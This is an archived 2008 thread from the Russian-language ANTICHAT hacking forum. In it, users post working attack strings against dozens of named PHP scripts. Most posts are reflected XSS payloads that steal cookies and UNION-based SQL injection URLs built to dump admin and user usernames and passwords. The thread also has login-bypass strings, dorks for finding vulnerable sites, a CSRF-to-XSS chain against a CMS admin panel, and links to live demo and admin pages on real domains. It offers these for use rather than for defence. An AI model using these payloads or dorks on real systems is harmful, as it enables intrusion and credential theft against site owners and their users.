ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.08.2008, 18:46
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
RotaBanner
XSS:
Код:
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
|
|
12.08.2008, 01:35
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
W-Agora
XSS:
Код:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/static/list.php?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
SQL:
Код:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx
Full path disclosure:
http://site/static/list.php?key=-1102352364
|
|
|
|
13.08.2008, 01:24
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
PRO-search
XSS:
Уязвимости в параметрах prot, host, path, name, ext, size, search_days, show_page
Код:
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
|
|
|
25.08.2008, 22:57
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Web Directory Script <= 2.0 (name) SQL Injection Vulnerability
magic_quotes_gpc = Off
http://localhost/ [installdir]/
Exploit:
Код:
listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
http://milw0rm.com/exploits/6298
Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities
magic_quotes_gpc = Off
http://localhost/ [installdir]/
Exploit:
Код:
index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Код:
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Dork:
made by matterdaddy
http://milw0rm.com/exploits/6297
(c)~!Dok_tOR!~
|
|
|
|
26.08.2008, 19:21
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
iFdate <= 2.0.3 Remote SQL Injection Vulnerability
Condition: magic_quotes_gpc = Off
http://localhost/[ installdir]/members_search.php
Search Name/Nickname
Exploit 1:
Код:
' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
Exploit 2:
Код:
' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
http://milw0rm.com/exploits/6315
(c) ~!Dok_tOR!~
|
|
|
|
12.09.2008, 19:09
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
Battle Scrypt SQL Injection
Author: ~!Dok_tOR!~
Date found: 26.08.08
Product: Battle Scrypt
Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Код:
http://localhost/[installdir]/search.php
Model Name:
Exploit:
Код:
' union select 1,user(),3/*
Код:
http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*
Big Fat Rate My Photo AdSense Website SQL Injection
Author: ~!Dok_tOR!~
Date found: 29.08.08
Product: Big Fat Rate My Photo AdSense Website
Price: $14.99
URL: www.dotcomallsorts.com
Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website. rar
Vulnerability Class: SQL Injection
Exploit 1:
Код:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
Exploit 2:
Код:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
Admin panel:
Код:
http://localhost/[installdir]/admin/
Article Publisher Pro <= v1.5 SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Article Publisher Pro v1.5
Price: $75
URL: www.phparticlescript.com
Vulnerability Class: SQL Injection
Exploit 1:
Код:
http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
Exploit 2:
Код:
http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
Dork:
All rights reserverd © Your Articles Pro 2002-2005
Copyright 2006 - 2008, Article Publisher PRO v1.5
Keepsakes SQL Injection
Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: Keepsakes
Price: $25
URL: harlandscripts.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
Opera -> Source(Ctrl+F3)
Exploit 2:
Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
Opera -> Source(Ctrl+F3)
Exploit 3:
Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
Opera -> Source(Ctrl+F3)
Exploit 4:
Код:
http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Exploit 5:
Код:
http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Admin panel:
Код:
http://localhost/[installdir]/admin/
Dork:
Copyright Your Keepsakes ® ™ 2007
Smart Traffic 6 in 1 SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Smart Traffic 6 in 1
Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit:
Код:
http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*
TopCoolive SQL Injection
Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: TopCoolive
URL: www.vetton.ru
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Код:
http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 2:
Код:
http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 3:
Код:
http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*
Warez Script (by Mikel Dean) SQL Injection
Author: ~!Dok_tOR!~
Date found: 27.08.08
Product: Warez Script
Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit 1:
Код:
http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
Exploit 2:
Код:
http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
Код:
http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
Admin Authentication Bypass
Код:
http://localhost/[installdir]/v2/login.php
User: 1' or 1=1/*
Pass: 1' or 1=1/*
(c) ~!Dok_tOR!~
Последний раз редактировалось ~!DoK_tOR!~; 19.09.2008 в 15:30..
|
|
|
|
19.09.2008, 14:19
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
На милворме был выложен эксплоит к E-Php CMS (http://milw0rm.com/exploits/6483) от разработчика www.ephpscripts.com, я решил проверить на наличие уязвимостей остальные их проекты (названия таблицы и колонок не были указаны, они одинаковые на всех скриптах).
E-Php B2B Trading Marketplace Script (listings.php cid) Remote SQL Injection Vulnerability
Exploit: http://www.site.com/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd) ,3,4,5,6,7,8+from+ephpb2b_admin/*
Example:
http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd) ,3,4,5,6,7,8+from+ephpb2b_admin/*
E-Php Shop Script (search_results.php cid) Remote SQL Injection Vulnerability
Exploit:
http://www.site.com/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2 +from+ephpb2b_admin/*
Example:
http://www.ephpscripts.com/demo/yng_wineshop/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2 +from+ephpscri_b2badeel.ephpb2b_admin/*
|
|
|
|
08.11.2008, 16:32
|
|
Banned
Регистрация: 30.10.2008
Сообщений: 8
Провел на форуме:
339315
Репутация:
16
|
|
Fundlink
SQL:
Код:
site.com/showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
PHP-Newsletter
SQL:
Код:
site/index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1
Com Endeavors
SQL:
Код:
site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,
concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2
/**/from/**/admin/*where,limit,2--
niccell
SQL:
Код:
site.com/list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,
concat(login,0x3a,password),444+from+admin_login/*
KwsPHP
SQL:
Код:
site.com/index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pass),4,5,6,7/**/from/**/users/*
Esy
SQL:
Код:
site.com/sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
Код:
site.com/ sections.php?op=printpage&artid=-9999999/**
/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
BosClassifieds Classified Ads System
SQL:
Код:
site.com/bosclassifieds/index.php?cat=[SQL]
pollBooth
SQL:
Код:
site.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
RS MAXSOFT
SQL:
Код:
site.com/modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
SSWD
SQL:
Код:
site.com/index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*
OpenLD
SQL:
Код:
site.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null ,null,null,null,null/**/FROM/**/settings--
Site Sift
SQL:
Код:
site.com/ndex.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*
Код:
site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,
10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Showlink
SQL:
Код:
site.com/index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kpro_user
eSyndiCat
SQL:
Код:
site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*
Bwired
SQL: i
Код:
site.com/ndex.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser
Md-Pro
SQL:
Код:
site.com/index.php?module=Topics&func=
view&topicid=-1 UNION ALL SELECT null,null,concat
(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*
eMeeting Online Dating Software
SQL:
Код:
site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
Код:
site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*
FlashGameScript
SQL:
Код:
site.com/index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+
from+members+where+user_type=2/*
Код:
site.com/index.php?func=member&user='+union+select+0,0,0,0,
0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr
om+members+where+user_type=2/*
|
|
|
|
13.11.2008, 23:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Author: Dimi4
Date found: 30.10.08
Product: Image Hosting System v1.3.4
Price: n\q
URL: www.webmastersadvantage.com (http://www.1phpscripts.com/Image_Hosting_System_Script.html)
Vulnerability Class: XSS
Vulnerability Script: viewimage.php
PHP код:
<?
$file = $_GET['file'];
if ($file == "") {
header("Location: " . $server_url);
exit;
}
.....
<img src="<?= $file ?>
http://127.0.0.1/ImageHostingSystem/viewimage.php?file=%22%3E%3Cscript%3Ealert()%3C/script%3E
Мда.. понял всё это зря... Открыта Админка 
Default path: /imageadmin/
http://www.photosharingworld.com/imageadmin/
__________________
BlackHat. MoDL
|
|
|
|
18.11.2008, 22:08
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
CMS Made Simple 1.4.1, возможно более старые версии.
Активная XSS в админке.
Уязвимый параметр: название новой категории при ее добавлении в Content -> News -> Categories (также уязвимы имена Field Definitions).
Чтобы "заставить" админа внедрить в название наш код, необходимо провести CSRF-атаку. Данные передаются через POST, но можно передать и GET'ом.
Формируем ссылку:
Код:
http://путь_до_каталога_CMS/admin/moduleinterface.php?mact=News,m1_,addcategory,0&m1_name=[XSS]
Лучше подгружать во фрейме. 
XSS будет доступна на странице:
Код:
http://путь_до_каталога_CMS/admin/moduleinterface.php?module=News
(с) iddqd
Через жопу конечно, но все равно
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
